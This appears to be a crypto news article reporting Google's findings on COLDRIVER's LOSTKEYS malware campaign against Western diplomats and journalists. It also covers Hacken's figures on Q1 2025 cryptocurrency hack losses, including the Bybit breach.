Russian-backed cyber-espionage group COLDRIVER has ramped up its tactics with the deployment of a new malware strain known as LOSTKEYS, targeting high-profile Western individuals and organizations, according to a new report from Google Threat Intelligence.
The threat actor, previously known for its credential phishing operations, is now adopting more advanced techniques to steal sensitive documents. The LOSTKEYS malware operates through a multi-stage infection chain, beginning with a deceptive lure website that mimics CAPTCHA verification. Once a victim interacts with the site, a malicious PowerShell script is stealthily copied to their clipboard. From there, the script executes a series of evasion techniques before downloading the final payload — the LOSTKEYS malware.
Once installed, LOSTKEYS can extract files from specific directories and extensions. It also gathers detailed system information and monitors active processes, transmitting this data back to COLDRIVER. Google identified the IP address associated with the malware’s infrastructure as “165.227.148[.]68.”
Google says it has blocked malicious domains via its Safe Browsing system to limit potential fallout.
COLDRIVER’s targeting profile includes Western diplomats, journalists, and policy experts. This marks a significant evolution for the group, which began in 2024 by deploying another malware variant, Spica, capable of executing shell commands and handling data transfers.
The discovery of LOSTKEYS comes amid a broader surge in cyberattacks. According to a separate report by cybersecurity firm Hacken, cryptocurrency-related hacks have already inflicted over $2 billion in losses in Q1 2025, surpassing all of 2024’s totals.
Hacken attributes the spike in attacks to ongoing operational security and access control lapses, even among leading centralized and decentralized platforms. Social engineering, too, has become a favoured tactic among attackers seeking to manipulate and exploit their targets.
The bulk of these losses stem from a massive breach: the $1.5 billion hack of Bybit in February, widely believed to be the work of the North Korea-linked Lazarus Group.
If you want to read more news articles like this, visit DeFi Planet and follow us on Twitter, LinkedIn, Facebook, Instagram, and CoinMarketCap Community.
“Take control of your crypto portfolio with MARKETS PRO, DeFi Planet’s suite of analytics tools.”
